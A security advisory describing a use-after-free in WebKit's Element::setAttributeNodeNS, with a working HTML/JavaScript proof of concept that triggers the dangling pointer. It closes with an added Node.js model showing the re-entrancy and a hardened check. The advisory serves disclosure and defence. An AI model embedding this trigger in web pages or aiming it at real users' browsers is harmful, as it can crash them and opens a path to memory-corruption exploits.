WebKit Element::setAttributeNodeNS Use-After-Free

2017.06.01
Credit: lokihardt
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

WebKit: Element::setAttributeNodeNS UAF

Here's a snippet of Element::setAttributeNodeNS.

ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
{
    ...
    setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);
    attrNode.attachToElement(*this);
    treeScope().adoptIfNeeded(attrNode);
    ensureAttrNodeListForElement(*this).append(&attrNode);
    return WTFMove(oldAttrNode);
}

|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again from inside |setAttributeInternal|, there will be two |Attr|s that have the same owner element and the same name once the first |setAttributeNodeNS| call returns. One of the |Attr|s will keep holding the raw pointer to the owner element even after the owner element is freed.

PoC:

<body>
<script>
// Allocate enough to pressure the collector so the removed iframe is actually freed.
function gc() {
    for (let i = 0; i < 0x40; i++) {
        new ArrayBuffer(0x1000000);
    }
}

// Runs synchronously from inside setAttributeInternal when the javascript: src is set on the iframe.
// At this point |src| has not yet been attached to |f|, so it can still be attached to |d|.
window.callback = () => {
    window.callback = null;
    d.setAttributeNodeNS(src);
    f.setAttributeNodeNS(document.createAttribute('src'));
};

let src = document.createAttribute('src');
src.value = 'javascript:parent.callback()';

let d = document.createElement('div');
let f = document.body.appendChild(document.createElement('iframe'));
// Re-entrant call above leaves |src| in |d|'s attribute node list while its owner pointer is |f|.
f.setAttributeNodeNS(src);

// Drop and free the iframe; |src| still holds the raw pointer to it.
f.remove();
f = null;
src = null;
gc();

// Reads the dangling owner pointer through |d|'s attribute list.
alert(d.attributes[0].ownerElement);
</script>
</body>

This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.

Found by: lokihardt
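The re-entrancy described above, as an added example that is not part of the original report and not WebKit code: a small JavaScript model of the attribute-node bookkeeping in Element::setAttributeNodeNS, runnable under Node without a DOM. The class names, the `runScriptHook` that stands in for "setting a javascript: src on an iframe runs script", and the `freed` flag that stands in for the element being destroyed are all the model's own assumptions. The hardened variant re-validates the Attr's owner after the step that may run script; that is one defensive fix for the model and is not claimed to be the patch WebKit shipped.

```javascript
// Model of the Element::setAttributeNodeNS re-entrancy (added example, not WebKit code).
class InUseAttributeError extends Error {}

class Attr {
  constructor(name, value) {
    this.name = name;
    this.value = value;
    this.ownerElement = null; // models Attr::m_element, a raw Element* in WebKit
  }
}

class Element {
  constructor(tag) {
    this.tag = tag;
    this.elementData = new Map(); // name -> value, models ElementData
    this.attrNodeList = [];       // models the per-element Attr node list
    this.freed = false;           // assumption: set when the element is destroyed
    this.runScriptHook = null;    // assumption: models script run by a javascript: iframe src
  }

  // Models setAttributeInternal: stores the value and, for the iframe case in the
  // PoC, synchronously runs script before the caller gets to attachToElement.
  setAttributeInternal(name, value) {
    this.elementData.set(name, value);
    if (this.runScriptHook && name === "src" && value.startsWith("javascript:")) {
      const hook = this.runScriptHook;
      this.runScriptHook = null; // run once, like window.callback = null in the PoC
      hook();
    }
  }

  _setAttributeNodeNS(attrNode, recheckAfterScript) {
    if (attrNode.ownerElement && attrNode.ownerElement !== this)
      throw new InUseAttributeError("attribute already in use");
    const oldIdx = this.attrNodeList.findIndex(a => a.name === attrNode.name);
    const oldAttrNode = oldIdx >= 0 ? this.attrNodeList.splice(oldIdx, 1)[0] : null;
    if (oldAttrNode === attrNode) return attrNode;
    if (oldAttrNode) oldAttrNode.ownerElement = null;

    this.setAttributeInternal(attrNode.name, attrNode.value); // may run script

    // Hardened variant only: script may have attached attrNode to another element
    // while we were inside setAttributeInternal, so the prologue check is stale.
    if (recheckAfterScript && attrNode.ownerElement && attrNode.ownerElement !== this)
      throw new InUseAttributeError("attribute was attached elsewhere by script");

    attrNode.ownerElement = this;   // models attachToElement(*this)
    this.attrNodeList.push(attrNode); // models ensureAttrNodeListForElement(*this).append
    return oldAttrNode;
  }
  setAttributeNodeNS(attrNode) { return this._setAttributeNodeNS(attrNode, false); }
  setAttributeNodeNSHardened(attrNode) { return this._setAttributeNodeNS(attrNode, true); }

  remove() { this.freed = true; } // models f.remove(); f = null; gc()
}

// Replays the PoC's sequence against the model and reports what d.attributes[0] sees.
function runPoC(useHardened) {
  const call = (el, attr) =>
    useHardened ? el.setAttributeNodeNSHardened(attr) : el.setAttributeNodeNS(attr);
  const src = new Attr("src", "javascript:parent.callback()");
  const d = new Element("div");
  const f = new Element("iframe");
  f.runScriptHook = () => {            // models window.callback
    call(d, src);                      // src is not yet owned, so this succeeds
    call(f, new Attr("src", ""));      // models document.createAttribute('src')
  };
  let error = null;
  try { call(f, src); } catch (e) { error = e; }
  f.remove();
  const attr0 = d.attrNodeList[0];     // d.attributes[0] in the PoC
  return {
    error: error ? error.constructor.name : null,
    attr0IsSrc: attr0 === src,
    ownerIsFreed: !!(attr0 && attr0.ownerElement && attr0.ownerElement.freed),
    ownerIsD: !!(attr0 && attr0.ownerElement === d),
  };
}

module.exports = { Attr, Element, InUseAttributeError, runPoC };
```

In the unhardened run `src` ends up in `d`'s node list while its owner pointer is the iframe that was just freed, which is exactly the state the PoC dereferences with `d.attributes[0].ownerElement`. In the hardened run the outer call notices after the script step that `src` now belongs to `d` and refuses to overwrite the owner.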


Copyright 2024, cxsecurity.com